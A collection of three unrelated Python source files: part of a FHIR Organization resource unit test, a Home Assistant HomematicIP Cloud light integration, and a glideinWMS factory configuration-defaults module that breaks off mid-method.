self.assertEqual(inst.contact[0].purpose.coding[0].system, "http://hl7.org/fhir/contactentity-type")
self.assertEqual(inst.contact[0].telecom[0].system, "phone")
self.assertEqual(inst.contact[0].telecom[0].value, "022-655 7654")
self.assertEqual(inst.contact[0].telecom[1].system, "email")
self.assertEqual(inst.contact[0].telecom[1].value, "KNO@burgersumc.nl")
self.assertEqual(inst.contact[0].telecom[2].system, "fax")
self.assertEqual(inst.contact[0].telecom[2].value, "022-655 0998")
self.assertEqual(inst.id, "f003")
self.assertEqual(inst.name, "Burgers UMC Ear,Nose,Throat unit")
self.assertEqual(inst.telecom[0].system, "phone")
self.assertEqual(inst.telecom[0].value, "022-655 6780")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "dept")
self.assertEqual(inst.type.coding[0].display, "Hospital Department")
self.assertEqual(inst.type.coding[0].system, "http://hl7.org/fhir/organization-type")
def testOrganization4(self):
inst = self.instantiate_from("organization-example-f201-aumc.json")
self.assertIsNotNone(inst, "Must have instantiated a Organization instance")
self.implOrganization4(inst)
js = inst.as_json()
self.assertEqual("Organization", js["resourceType"])
inst2 = organization.Organization(js)
self.implOrganization4(inst2)
def implOrganization4(self, inst):
self.assertTrue(inst.active)
self.assertEqual(inst.address[0].city, "Den Helder")
self.assertEqual(inst.address[0].country, "NLD")
self.assertEqual(inst.address[0].line[0], "Walvisbaai 3")
self.assertEqual(inst.address[0].postalCode, "2333ZA")
self.assertEqual(inst.address[0].use, "work")
self.assertEqual(inst.contact[0].address.city, "Den helder")
self.assertEqual(inst.contact[0].address.country, "NLD")
self.assertEqual(inst.contact[0].address.line[0], "Walvisbaai 3")
self.assertEqual(inst.contact[0].address.line[1], "Gebouw 2")
self.assertEqual(inst.contact[0].address.postalCode, "2333ZA")
self.assertEqual(inst.contact[0].name.family[0], "Brand")
self.assertEqual(inst.contact[0].name.given[0], "Ronald")
self.assertEqual(inst.contact[0].name.prefix[0], "Prof.Dr.")
self.assertEqual(inst.contact[0].name.text, "Professor Brand")
self.assertEqual(inst.contact[0].name.use, "official")
self.assertEqual(inst.contact[0].telecom[0].system, "phone")
self.assertEqual(inst.contact[0].telecom[0].use, "work")
self.assertEqual(inst.contact[0].telecom[0].value, "+31715269702")
self.assertEqual(inst.id, "f201")
self.assertEqual(inst.identifier[0].system, "http://www.zorgkaartnederland.nl/")
self.assertEqual(inst.identifier[0].use, "official")
self.assertEqual(inst.identifier[0].value, "Artis University Medical Center")
self.assertEqual(inst.name, "Artis University Medical Center (AUMC)")
self.assertEqual(inst.telecom[0].system, "phone")
self.assertEqual(inst.telecom[0].use, "work")
self.assertEqual(inst.telecom[0].value, "+31715269111")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "405608006")
self.assertEqual(inst.type.coding[0].display, "Academic Medical Center")
self.assertEqual(inst.type.coding[0].system, "http://snomed.info/sct")
self.assertEqual(inst.type.coding[1].code, "V6")
self.assertEqual(inst.type.coding[1].display, "University Medical Hospital")
self.assertEqual(inst.type.coding[1].system, "urn:oid:2.16.840.1.113883.2.4.15.1060")
self.assertEqual(inst.type.coding[2].code, "prov")
self.assertEqual(inst.type.coding[2].display, "Healthcare Provider")
self.assertEqual(inst.type.coding[2].system, "http://hl7.org/fhir/organization-type")
def testOrganization5(self):
inst = self.instantiate_from("organization-example-f203-bumc.json")
self.assertIsNotNone(inst, "Must have instantiated a Organization instance")
self.implOrganization5(inst)
js = inst.as_json()
self.assertEqual("Organization", js["resourceType"])
inst2 = organization.Organization(js)
self.implOrganization5(inst2)
def implOrganization5(self, inst):
self.assertTrue(inst.active)
self.assertEqual(inst.address[0].city, "Blijdorp")
self.assertEqual(inst.address[0].country, "NLD")
self.assertEqual(inst.address[0].line[0], "apenrots 230")
self.assertEqual(inst.address[0].postalCode, "3056BE")
self.assertEqual(inst.address[0].use, "work")
self.assertEqual(inst.id, "f203")
self.assertEqual(inst.identifier[0].system, "http://www.zorgkaartnederland.nl/")
self.assertEqual(inst.identifier[0].type.text, "Zorginstelling naam")
self.assertEqual(inst.identifier[0].use, "official")
self.assertEqual(inst.identifier[0].value, "Blijdorp MC")
self.assertEqual(inst.name, "Blijdorp Medisch Centrum (BUMC)")
self.assertEqual(inst.telecom[0].system, "phone")
self.assertEqual(inst.telecom[0].use, "work")
self.assertEqual(inst.telecom[0].value, "+31107040704")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "405608006")
self.assertEqual(inst.type.coding[0].display, "Academic Medical Center")
self.assertEqual(inst.type.coding[0].system, "http://snomed.info/sct")
self.assertEqual(inst.type.coding[1].code, "prov")
self.assertEqual(inst.type.coding[1].system, "http://hl7.org/fhir/organization-type")
def testOrganization6(self):
inst = self.instantiate_from("organization-example-gastro.json")
self.assertIsNotNone(inst, "Must have instantiated a Organization instance")
self.implOrganization6(inst)
js = inst.as_json()
self.assertEqual("Organization", js["resourceType"])
inst2 = organization.Organization(js)
self.implOrganization6(inst2)
def implOrganization6(self, inst):
self.assertEqual(inst.id, "1")
self.assertEqual(inst.identifier[0].system, "http://www.acme.org.au/units")
self.assertEqual(inst.identifier[0].value, "Gastro")
self.assertEqual(inst.name, "Gastroenterology")
self.assertEqual(inst.telecom[0].system, "phone")
self.assertEqual(inst.telecom[0].use, "mobile")
self.assertEqual(inst.telecom[0].value, "+1 555 234 3523")
self.assertEqual(inst.telecom[1].system, "email")
self.assertEqual(inst.telecom[1].use, "work")
self.assertEqual(inst.telecom[1].value, "gastro@acme.org")
self.assertEqual(inst.text.status, "generated")
def testOrganization7(self):
inst = self.instantiate_from("organization-example-good-health-care.json")
self.assertIsNotNone(inst, "Must have instantiated a Organization instance")
self.implOrganization7(inst)
js = inst.as_json()
self.assertEqual("Organization", js["resourceType"])
inst2 = organization.Organization(js)
self.implOrganization7(inst2)
def implOrganization7(self, inst):
self.assertEqual(inst.id, "2.16.840.1.113883.19.5")
self.assertEqual(inst.identifier[0].system, "urn:ietf:rfc:3986")
self.assertEqual(inst.identifier[0].value, "2.16.840.1.113883.19.5")
self.assertEqual(inst.name, "Good Health Clinic")
self.assertEqual(inst.text.status, "generated")
def testOrganization8(self):
inst = self.instantiate_from("organization-example-insurer.json")
self.assertIsNotNone(inst, "Must have instantiated a Organization instance")
self.implOrganization8(inst)
js = inst.as_json()
self.assertEqual("Organization", js["resourceType"])
inst2 = organization.Organization(js)
self.implOrganization8(inst2)
def implOrganization8(self, inst):
self.assertEqual(inst.id, "2")
self.assertEqual(inst.identifier[0].system, "urn:oid:2.16.840.1.113883.3.19.2.3")
self.assertEqual(inst.identifier[0].value, "666666")
self.assertEqual(inst.name, "XYZ Insurance")
self.assertEqual(inst.text.status, "generated")
def testOrganization9(self):
inst = self.instantiate_from("organization-example-lab.json")
self.assertIsNotNone(inst, "Must have instantiated a Organization instance")
self.implOrganization9(inst)
js = inst.as_json()
self.assertEqual("Organization", js["resourceType"])
inst2 = organization.Organization(js)
self.implOrganization9(inst2)
def implOrganization9(self, inst):
self.assertEqual(inst.id, "1832473e-2fe0-452d-abe9-3cdb9879522f")
self.assertEqual(inst.identifier[0].system, "http://www.acme.org.au/units")
self.assertEqual(inst.identifier[0].value, "ClinLab")
self.assertEqual(inst.name, "Clinical Lab")
self.assertEqual(inst.telecom[0].system, "phone")
self.assertEqual(inst.telecom[0].use, "work")
self.assertEqual(inst.telecom[0].value, "+1 555 234 1234")
self.assertEqual(inst.telecom[1].system, "email")
self.assertEqual(inst.telecom[1].use, "work")
self.assertEqual(inst.telecom[1].value, "contact@labs.acme.org")
self.assertEqual(inst.text.status, "generated")
def testOrganization10(self):
inst = self.instantiate_from("organization-example.json")
self.assertIsNotNone(inst, "Must have instantiated a Organization instance")
self.implOrganization10(inst)
js = inst.as_json()
self.assertEqual("Organization", js["resourceType"])
inst2 = organization.Organization(js)
self.implOrganization10(inst2)
def implOrganization10(self, inst):
self.assertEqual(inst.address[0].city, "Ann Arbor")
self.assertEqual(inst.address[0].country, "USA")
self.assertEqual(inst.address[0].line[0], "3300 Washtenaw Avenue, Suite 227")
self.assertEqual(inst.address[0].postalCode, "48104")
self.assertEqual(inst.address[0].state, "MI")
self.assertEqual(inst.extension[0].url, "http://hl7.org/fhir/StructureDefinition/organization-alias")
self.assertEqual(inst.extension[0].valueString, "HL7 International")
self.assertEqual(inst.id, "hl7")
self.assertEqual(inst.name, "Health Level Seven International")
self.assertEqual(inst.telecom[0].system, "phone")
self.assertEqual(inst.telecom[0].value, "(+1) 734-677-7777")
self.assertEqual(inst.telecom[1].system, "fax")
self.assertEqual(inst.telecom[1].value, "(+1) 734-677-6622")
self.assertEqual(inst.telecom[2].system, "email")
self.assertEqual(inst.telecom[2].value, "hq@HL7.org")
self.assertEqual(inst.text.status, "generated")
| |
"""Support for HomematicIP Cloud lights."""
import logging
from homeassistant.components.light import (
ATTR_BRIGHTNESS, ATTR_COLOR_NAME, ATTR_HS_COLOR, SUPPORT_BRIGHTNESS,
SUPPORT_COLOR, Light)
from . import DOMAIN as HMIPC_DOMAIN, HMIPC_HAPID, HomematicipGenericDevice
_LOGGER = logging.getLogger(__name__)
ATTR_ENERGY_COUNTER = 'energy_counter_kwh'
ATTR_POWER_CONSUMPTION = 'power_consumption'
async def async_setup_platform(
hass, config, async_add_entities, discovery_info=None):
"""Old way of setting up HomematicIP Cloud lights."""
pass
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the HomematicIP Cloud lights from a config entry."""
from homematicip.aio.device import AsyncBrandSwitchMeasuring, AsyncDimmer,\
AsyncPluggableDimmer, AsyncBrandDimmer, AsyncFullFlushDimmer,\
AsyncBrandSwitchNotificationLight
home = hass.data[HMIPC_DOMAIN][config_entry.data[HMIPC_HAPID]].home
devices = []
for device in home.devices:
if isinstance(device, AsyncBrandSwitchMeasuring):
devices.append(HomematicipLightMeasuring(home, device))
elif isinstance(device, AsyncBrandSwitchNotificationLight):
devices.append(HomematicipLight(home, device))
devices.append(HomematicipNotificationLight(
home, device, device.topLightChannelIndex))
devices.append(HomematicipNotificationLight(
home, device, device.bottomLightChannelIndex))
elif isinstance(device,
(AsyncDimmer, AsyncPluggableDimmer,
AsyncBrandDimmer, AsyncFullFlushDimmer)):
devices.append(HomematicipDimmer(home, device))
if devices:
async_add_entities(devices)
class HomematicipLight(HomematicipGenericDevice, Light):
"""Representation of a HomematicIP Cloud light device."""
def __init__(self, home, device):
"""Initialize the light device."""
super().__init__(home, device)
@property
def is_on(self):
"""Return true if device is on."""
return self._device.on
async def async_turn_on(self, **kwargs):
"""Turn the device on."""
await self._device.turn_on()
async def async_turn_off(self, **kwargs):
"""Turn the device off."""
await self._device.turn_off()
class HomematicipLightMeasuring(HomematicipLight):
"""Representation of a HomematicIP Cloud measuring light device."""
@property
def device_state_attributes(self):
"""Return the state attributes of the generic device."""
attr = super().device_state_attributes
if self._device.currentPowerConsumption > 0.05:
attr[ATTR_POWER_CONSUMPTION] = \
round(self._device.currentPowerConsumption, 2)
attr[ATTR_ENERGY_COUNTER] = round(self._device.energyCounter, 2)
return attr
class HomematicipDimmer(HomematicipGenericDevice, Light):
"""Representation of HomematicIP Cloud dimmer light device."""
def __init__(self, home, device):
"""Initialize the dimmer light device."""
super().__init__(home, device)
@property
def is_on(self):
"""Return true if device is on."""
return self._device.dimLevel != 0
@property
def brightness(self):
"""Return the brightness of this light between 0..255."""
return int(self._device.dimLevel*255)
@property
def supported_features(self):
"""Flag supported features."""
return SUPPORT_BRIGHTNESS
async def async_turn_on(self, **kwargs):
"""Turn the light on."""
if ATTR_BRIGHTNESS in kwargs:
await self._device.set_dim_level(kwargs[ATTR_BRIGHTNESS]/255.0)
else:
await self._device.set_dim_level(1)
async def async_turn_off(self, **kwargs):
"""Turn the light off."""
await self._device.set_dim_level(0)
class HomematicipNotificationLight(HomematicipGenericDevice, Light):
"""Representation of HomematicIP Cloud dimmer light device."""
def __init__(self, home, device, channel_index):
"""Initialize the dimmer light device."""
self._channel_index = channel_index
if self._channel_index == 2:
super().__init__(home, device, 'Top')
else:
super().__init__(home, device, 'Bottom')
from homematicip.base.enums import RGBColorState
self._color_switcher = {
RGBColorState.WHITE: [0.0, 0.0],
RGBColorState.RED: [0.0, 100.0],
RGBColorState.YELLOW: [60.0, 100.0],
RGBColorState.GREEN: [120.0, 100.0],
RGBColorState.TURQUOISE: [180.0, 100.0],
RGBColorState.BLUE: [240.0, 100.0],
RGBColorState.PURPLE: [300.0, 100.0]
}
@property
def _channel(self):
return self._device.functionalChannels[self._channel_index]
@property
def is_on(self):
"""Return true if device is on."""
return self._channel.dimLevel > 0.0
@property
def brightness(self):
"""Return the brightness of this light between 0..255."""
return int(self._channel.dimLevel * 255)
@property
def hs_color(self):
"""Return the hue and saturation color value [float, float]."""
simple_rgb_color = self._channel.simpleRGBColorState
return self._color_switcher.get(simple_rgb_color, [0.0, 0.0])
@property
def device_state_attributes(self):
"""Return the state attributes of the generic device."""
attr = super().device_state_attributes
if self.is_on:
attr[ATTR_COLOR_NAME] = self._channel.simpleRGBColorState
return attr
@property
def name(self):
"""Return the name of the generic device."""
return "{} {}".format(super().name, 'Notification')
@property
def supported_features(self):
"""Flag supported features."""
return SUPPORT_BRIGHTNESS | SUPPORT_COLOR
@property
def unique_id(self) -> str:
"""Return a unique ID."""
return "{}_{}_{}".format(self.__class__.__name__,
self.post,
self._device.id)
async def async_turn_on(self, **kwargs):
"""Turn the light on."""
# Use hs_color from kwargs,
# if not applicable use current hs_color.
hs_color = kwargs.get(ATTR_HS_COLOR, self.hs_color)
simple_rgb_color = _convert_color(hs_color)
# Use brightness from kwargs,
# if not applicable use current brightness.
brightness = kwargs.get(ATTR_BRIGHTNESS, self.brightness)
# If no kwargs, use default value.
if not kwargs:
brightness = 255
# Minimum brightness is 10, otherwise the led is disabled
brightness = max(10, brightness)
dim_level = brightness / 255.0
await self._device.set_rgb_dim_level(
self._channel_index,
simple_rgb_color,
dim_level)
async def async_turn_off(self, **kwargs):
"""Turn the light off."""
simple_rgb_color = self._channel.simpleRGBColorState
await self._device.set_rgb_dim_level(
self._channel_index,
simple_rgb_color, 0.0)
def _convert_color(color):
"""
Convert the given color to the reduced RGBColorState color.
RGBColorStat contains only 8 colors including white and black,
so a conversion is required.
"""
from homematicip.base.enums import RGBColorState
if color is None:
return RGBColorState.WHITE
hue = int(color[0])
saturation = int(color[1])
if saturation < 5:
return RGBColorState.WHITE
if 30 < hue <= 90:
return RGBColorState.YELLOW
if 90 < hue <= 160:
return RGBColorState.GREEN
if 150 < hue <= 210:
return RGBColorState.TURQUOISE
if 210 < hue <= 270:
return RGBColorState.BLUE
if 270 < hue <= 330:
return RGBColorState.PURPLE
return RGBColorState.RED
| |
#
# Project:
# glideinWMS
#
# File Version:
#
# Desscription:
# This module contains the create_glidein params class
#
# Author:
# Igor Sfiligoi
#
import os
import copy
import sys
import os.path
import string
import socket
import types
import traceback
from glideinwms.lib import xmlParse
from glideinwms.lib import condorExe
import cWParams
######################################################
class GlideinParams(cWParams.CommonParams):
"""
Contains all the factory configuration values as params. Used in create_glideins and recreate_glideins.
"""
def init_defaults(self):
"""
Populates the defaults for all the factory configuration values.
"""
self.init_support_defaults()
# Defaults for allowing frontends in a whitelist
# in the factory config (per entry point)
self.allow_defaults = cWParams.commentedOrderedDict()
self.allow_defaults["name"] = (None, "string", "frontend name", None)
self.allow_defaults["security_class"] = ("All", "string", "security class", None)
# publishing specific to factory
self.attr_defaults["publish"] = ("True", "Bool", "Should it be published by the factory?", None)
self.attr_defaults["const"] = ("True", "Bool", "Should it be constant? (Else it can be overriden by the frontend. Used only if parameter is True.)", None)
self.infosys_defaults = cWParams.commentedOrderedDict()
self.infosys_defaults["type"] = (None, "RESS|BDII", "Type of information system", None)
self.infosys_defaults["server"] = (None, "host", "Location of the infosys server", None)
self.infosys_defaults["ref"] = (None, "id", "Referenced for the entry point in the infosys", None)
self.mongroup_defaults = cWParams.commentedOrderedDict()
self.mongroup_defaults["group_name"] = (None, "groupname", "Name of the monitoring group", None)
entry_config_defaults = cWParams.commentedOrderedDict()
entry_config_max_jobs_defaults = cWParams.commentedOrderedDict()
max_jobs_per_entry_defaults = cWParams.commentedOrderedDict()
max_jobs_per_entry_defaults["glideins"] = ('10000', "nr", "Maximum number of concurrent glideins (per entry) that can be submitted.", None)
max_jobs_per_entry_defaults["idle"] = ('2000', "nr", "Maximum number of idle glideins (per entry) allowed.", None)
max_jobs_per_entry_defaults["held"] = ('1000', "nr", "Maximum number of held glideins (per entry) before forcing the cleanup.", None)
entry_config_max_jobs_defaults['per_entry'] = max_jobs_per_entry_defaults
max_jobs_default_per_frontend_defaults = cWParams.commentedOrderedDict()
max_jobs_default_per_frontend_defaults["glideins"] = ('5000', "nr", "Maximum number of concurrent glideins (default per frontend) that can be submitted.", None)
max_jobs_default_per_frontend_defaults["idle"] = ('100', "nr", "Maximum number of idle glideins (default per frontend) allowed.", None)
max_jobs_default_per_frontend_defaults["held"] = ('50', "nr", "Maximum number of held glideins (default per frontend) before forcing the cleanup.", None)
entry_config_max_jobs_defaults['default_per_frontend'] = max_jobs_default_per_frontend_defaults
max_jobs_per_frontend_defaults = cWParams.commentedOrderedDict()
max_jobs_per_frontend_defaults["name"] = (None, "string", "frontend name", None)
max_jobs_per_frontend_defaults["held"] = ('50', "nr", "Maximum number of held glideins (for this frontend) before forcing the cleanup.", None)
max_jobs_per_frontend_defaults["idle"] = ('100', "nr", "Maximum number of idle glideins (for this frontend) allowed.", None)
max_jobs_per_frontend_defaults["glideins"] = ('5000', "nr", "Maximum number of concurrent glideins (per frontend) that can be submitted", None)
entry_config_max_jobs_defaults["per_frontends"] = (xmlParse.OrderedDict(), 'Dictionary of frontends', "Each frontend entry contains", max_jobs_per_frontend_defaults)
entry_config_defaults['max_jobs'] = entry_config_max_jobs_defaults
entry_config_restrictions_defaults=cWParams.commentedOrderedDict()
entry_config_restrictions_defaults["require_voms_proxy"]=("False","Bool","Whether this entry point requires a voms proxy",None)
entry_config_restrictions_defaults["require_glidein_glexec_use"]=("False","Bool","Whether this entry requires glidein to use glexec",None)
entry_config_defaults['restrictions']=entry_config_restrictions_defaults
entry_config_queue_defaults = cWParams.commentedOrderedDict()
entry_config_queue_defaults["max_per_cycle"] = ['100', "nr", "Maximum number of jobs affected per cycle.", None]
entry_config_queue_defaults["sleep"] = ['0.2', "seconds", "Sleep between interactions with the schedd.", None]
entry_config_defaults['submit'] = copy.deepcopy(entry_config_queue_defaults)
entry_config_defaults['submit']['cluster_size'] = ['10', "nr", "Max number of jobs submitted in a single transaction.", None]
entry_config_defaults['submit']['slots_layout'] = ['fixed', "string", "The way multiple slots should be setup.", None]
self.submit_attrs = cWParams.commentedOrderedDict()
self.submit_attrs["value"] = ("All", "string", "HTCondor classad value", None)
entry_config_defaults['submit']['submit_attrs'] = (xmlParse.OrderedDict(), 'Dictionary of submit attributes', "Each attribute contains", self.submit_attrs)
entry_config_defaults['remove'] = copy.deepcopy(entry_config_queue_defaults)
entry_config_defaults['remove']['max_per_cycle'][0] = '5'
entry_config_defaults['release'] = copy.deepcopy(entry_config_queue_defaults)
entry_config_defaults['release']['max_per_cycle'][0] = '20'
# not exported and order does not matter, can stay a regular dictionary
sub_defaults = {'attrs':(xmlParse.OrderedDict(), 'Dictionary of attributes', "Each attribute entry contains", self.attr_defaults),
'files':([], 'List of files', "Each file entry contains", self.file_defaults),
'infosys_refs':([], 'List of information system references', "Each reference points to this entry", self.infosys_defaults),
'monitorgroups':([], 'List of monitoring groups', "Each group entry belongs to", self.mongroup_defaults)}
self.entry_defaults = cWParams.commentedOrderedDict()
self.entry_defaults["gatekeeper"] = (None, 'gatekeeper', 'Grid gatekeeper/resource', None)
self.entry_defaults["gridtype"] = ('gt2', 'grid_type', 'Condor Grid type', None)
self.entry_defaults["trust_domain"] = ('OSG', 'trust_domain', 'Entry trust domain', None)
self.entry_defaults["auth_method"] = ('grid_proxy', 'auth_method', 'Type of auth method this entry supports', None)
self.entry_defaults["vm_id"] = (None, 'vm_id', 'VM id this entry supports', None)
self.entry_defaults["vm_type"] = (None, 'vm_type', 'VM type this entry supports', None)
self.entry_defaults["rsl"] = (None, 'RSL', 'Globus gt2 RSL option', None)
self.entry_defaults['schedd_name'] = (None, "ScheddName", "Which schedd to use (Overrides the global one if specified)", None)
self.entry_defaults["work_dir"] = (".", ".|Condor|OSG|TMPDIR", "Where to start glidein", None)
self.entry_defaults['proxy_url'] = (None, 'proxy_url', "Squid cache to use", None)
self.entry_defaults['verbosity'] = ('std', 'std|nodebug|fast', "Verbosity level and timeout setting", None)
self.entry_defaults["enabled"] = ("True", "Bool", "Is this entry enabled?", None)
self.entry_defaults["config"] = entry_config_defaults
self.entry_defaults["attrs"] = sub_defaults['attrs']
self.entry_defaults["files"] = sub_defaults['files']
self.entry_defaults["infosys_refs"] = sub_defaults['infosys_refs']
self.entry_defaults["monitorgroups"] = copy.deepcopy(sub_defaults['monitorgroups'])
self.entry_defaults["allow_frontends"] = (xmlParse.OrderedDict(), 'Dictionary of frontends', "Each frontend entry contains", self.allow_defaults)
###############################
# Start defining the defaults
self.defaults["factory_name"] = (socket.gethostname(), 'ID', 'Factory name', None)
self.defaults["glidein_name"] = (None, 'ID', 'Glidein name', None)
self.defaults['schedd_name'] = ("schedd_glideins@%s" % socket.gethostname(), "ScheddName", "Which schedd to use, can be a comma separated list", None)
self.defaults['factory_collector'] = (None, "CollectorName", "Which collector should we use for factory ClassAds", None)
self.defaults['factory_versioning'] = ('True', 'Bool', 'Should we create versioned subdirectories?', None)
submit_defaults = cWParams.commentedOrderedDict()
submit_defaults["base_dir"] = ("%s/glideinsubmit" % os.environ["HOME"], "base_dir", "Submit base dir", None)
submit_defaults["base_log_dir"] = ("%s/glideinlog" % os.environ["HOME"], "log_dir", "Submit base log dir", None)
submit_defaults["base_client_log_dir"] = ("%s/glideclientlog" % os.environ["HOME"], "client_dir", "Base dir for client logs, needs a user_<uid> subdir per frontend user", None)
submit_defaults["base_client_proxies_dir"] = ("%s/glideclientproxies" % os.environ["HOME"], "client_dir", "Base dir for client proxies, needs a user_<uid> subdir per frontend user", None)
self.defaults["submit"] = submit_defaults
one_log_retention_defaults = cWParams.commentedOrderedDict()
one_log_retention_defaults["min_days"] = ["3.0", "days", "Min number of days the logs must be preserved (even if they use too much space)", None]
one_log_retention_defaults["max_days"] = ["7.0", "days", "Max number of days the logs should be preserved", None]
one_log_retention_defaults["max_mbytes"] = ["100.0", "Mbytes", "Max number of Mbytes the logs can use", None]
monitor_footer_defaults=cWParams.commentedOrderedDict()
monitor_footer_defaults["display_txt"] = ["", "string", "what will be displayed at the bottom of the monitoring page", None]
monitor_footer_defaults["href_link"] = ["", "string", "where to link to", None]
self.defaults["monitor_footer"] = monitor_footer_defaults
process_log_defaults = copy.deepcopy(one_log_retention_defaults)
process_log_defaults['extension'] = ["all", "string", "name of the log extention", None]
process_log_defaults['msg_types'] = ["INFO, WARN, ERR", "string", "types of log messages", None]
process_log_defaults['backup_count'] = ["5", "string", "Number of backup logs to keep", None]
process_log_defaults['compression'] = ["", "string", "Compression for backup log files", None]
log_retention_defaults = cWParams.commentedOrderedDict()
log_retention_defaults["process_logs"] = ([], 'Dictionary of log types', "Each log corresponds to a log file", copy.deepcopy(process_log_defaults))
log_retention_defaults["job_logs"] = copy.deepcopy(one_log_retention_defaults)
log_retention_defaults["job_logs"]["min_days"][0] = "2.0"
self.defaults['advertise_with_tcp'] = ('True', 'Bool', 'Should condor_advertise use TCP connections?', None)
self.defaults['advertise_with_multiple'] = ('True', 'Bool', 'Should condor_advertise use -multiple?', None)
log_retention_defaults["summary_logs"] = copy.deepcopy(one_log_retention_defaults)
log_retention_defaults["summary_logs"]["max_days"][0] = "31.0"
log_retention_defaults["condor_logs"] = copy.deepcopy(one_log_retention_defaults)
log_retention_defaults["condor_logs"]["max_days"][0] = "14.0"
self.defaults["log_retention"] = log_retention_defaults
self.defaults['loop_delay'] = ('60', 'seconds', 'Number of seconds between iterations', None)
self.defaults['advertise_delay'] = ('5', 'NR', 'Advertize evert NR loops', None)
self.defaults['restart_attempts'] = ('3', 'NR', 'Max allowed NR restarts every restart_interval before shutting down', None)
self.defaults['restart_interval'] = ('1800', 'NR', 'Time interval NR sec which allow max restart attempts', None)
self.defaults['entry_parallel_workers'] = ('0', 'NR', 'Number of entries that will perform the work in parallel', None)
stage_defaults = cWParams.commentedOrderedDict()
stage_defaults["base_dir"] = ("/var/www/html/glidefactory/stage", "base_dir", "Stage base dir", None)
stage_defaults["web_base_url"] = ("http://%s/glidefactory/stage" % socket.gethostname(), 'base_url', 'Base Web server URL', None)
stage_defaults["use_symlink"] = ("True", "Bool", "Can I symlink stage dir from submit dir?", None)
self.defaults["stage"] = stage_defaults
self.monitor_defaults["base_dir"] = ("/var/www/html/glidefactory/monitor", "base_dir", "Monitoring base dir", None)
# Default for rrd update threads
self.monitor_defaults["update_thread_count"]=(os.sysconf('SC_NPROCESSORS_ONLN'),"update_thread_count","Number of rrd update threads. Defaults to cpu count.",None)
self.defaults["monitor"] = self.monitor_defaults
self.frontend_sec_class_defaults = cWParams.commentedOrderedDict()
self.frontend_sec_class_defaults["username"] = (None, 'username', 'UNIX ID to be used for this security class', None)
self.frontend_defaults = cWParams.commentedOrderedDict()
self.frontend_defaults["identity"] = (None, 'identity', 'Authenticated Identity', None)
self.frontend_defaults["security_classes"] = (xmlParse.OrderedDict(), "Dictionary of security class maps", "Each mapping contains", self.frontend_sec_class_defaults)
monitoring_collector_defaults=cWParams.commentedOrderedDict()
monitoring_collector_defaults["node"]=(None,"nodename","Factory monitoring collector node name (for example, col1.my.org:9999)",None)
monitoring_collector_defaults["DN"]=(None,"dn","Factory collector distinguised name (subject) (for example, /DC=org/DC=myca/OU=Services/CN=col1.my.org)",None)
monitoring_collector_defaults["secondary"]=("False","Bool","Secondary nodes will be used by glideins, if present",None)
monitoring_collector_defaults["group"]=("default","string","Collector group name useful to group HA setup",None)
self.defaults["monitoring_collectors"]=([],'List of factory monitoring collectors',"Each collector contains",monitoring_collector_defaults)
security_default=cWParams.commentedOrderedDict()
security_default["pub_key"]=("RSA","None|RSA","Type of public key system used for secure message passing",None)
security_default["reuse_oldkey_onstartup_gracetime"]=("900","seconds","Time in sec old key can be used to decrypt requests from frontend",None)
security_default["remove_old_cred_freq"] = ("24", "hours", "Frequency in hrs for cleaning unused credentials", None)
security_default["remove_old_cred_age"] = ("30", "days", "Credentials older than this should be removed", None)
security_default["key_length"]=("2048","bits","Key length in bits",None)
security_default["frontends"]=(xmlParse.OrderedDict(),"Dictionary of frontend","Each frontend contains",self.frontend_defaults)
self.defaults["security"] = security_default
condor_defaults = cWParams.commentedOrderedDict()
condor_defaults["os"] = ("default", "osname", "Operating System (like linux-rhel3)", None)
condor_defaults["arch"] = ("default", "arch", "Architecture (like x86)", None)
condor_defaults["version"] = ("default", "arch", "Architecture (like x86)", None)
condor_defaults["tar_file"] = (None, "fname", "Tarball containing condor binaries (overrides base_dir if defined)", None)
condor_defaults["base_dir"] = (None, "base_dir", "Condor distribution base dir (used only if tar_file undefined)", None)
self.defaults["condor_tarballs"] = ([], 'List of condor tarballs', "Each entry contains", condor_defaults)
self.defaults["attrs"] = sub_defaults['attrs']
self.defaults["files"] = copy.deepcopy(sub_defaults['files'])
# ordering is specific to global section of factory
self.defaults["files"][3]["after_entry"] = ("False", 'Bool', 'Should this file be loaded after the entry ones?', None)
self.defaults["entries"] = (xmlParse.OrderedDict(), "Dictionary of entries", "Each entry contains", self.entry_defaults)
return
# return name of top element
def get_top_element(self):
return "glidein"
def buildDir(self, factoryVersioning, basedir):
# return either basedir or basedir/frontend_fename
glidein_subdir="glidein_%s"%self.glidein_name
if factoryVersioning:
return os.path.join(basedir, glidein_subdir)
else:
return basedir
# validate data and add additional attributes if needed
def derive(self):
# glidein name does not have a reasonable default
if self.glidein_name is None:
raise RuntimeError, "Missing glidein name"
if not cWParams.is_valid_name(self.glidein_name):
raise RuntimeError, "Invalid glidein name '%s'"%self.glidein_name
if self.factory_collector=="default":
raise RuntimeError, '"default" is a reserved keyword, cannot be used as factory_collector'
factoryVersioning = False
if self.data.has_key('factory_versioning') and \
self.data['factory_versioning'].lower() == 'true':
factoryVersioning = True
self.stage_dir=self.buildDir(factoryVersioning, self.stage.base_dir)
self.monitor_dir=self.buildDir(factoryVersioning, self.monitor.base_dir)
self.submit_dir=self.buildDir(factoryVersioning, self.submit.base_dir)
self.log_dir=self.buildDir(factoryVersioning, self.submit.base_log_dir)
self.web_url=self.buildDir(factoryVersioning, self.stage.web_base_url)
self.client_log_dirs={}
self.client_proxies_dirs={}
for fename in self.security.frontends.keys():
if not cWParams.is_valid_name(fename):
raise RuntimeError, "Invalid frontend name '%s'"%fename
if ' ' in self.security.frontends[fename].identity:
raise RuntimeError, "Invalid frontend identity '%s'"%self.security.frontends[fename].identity
for scname in self.security.frontends[fename].security_classes.keys():
username=self.security.frontends[fename].security_classes[scname].username
self.client_log_dirs[username]=self.buildDir(True, os.path.join(self.submit.base_client_log_dir,"user_%s"%username))
self.client_proxies_dirs[username]=self.buildDir(True, os.path.join(self.submit.base_client_proxies_dir,"user_%s"%username))
if not cWParams.is_valid_name(self.factory_name):
raise RuntimeError, "Invalid factory name '%s'"%self.factory_name
entry_names=self.entries.keys()
for entry_name in entry_names:
if not cWParams.is_valid_name(entry_name):
raise RuntimeError, "Invalid entry name '%s'"%entry_name
attr_names=self.attrs.keys()
for attr_name in attr_names:
if not cWParams.is_valid_name(attr_name):
raise RuntimeError, "Invalid global attribute name '%s'."%attr_name
for entry_name in entry_names:
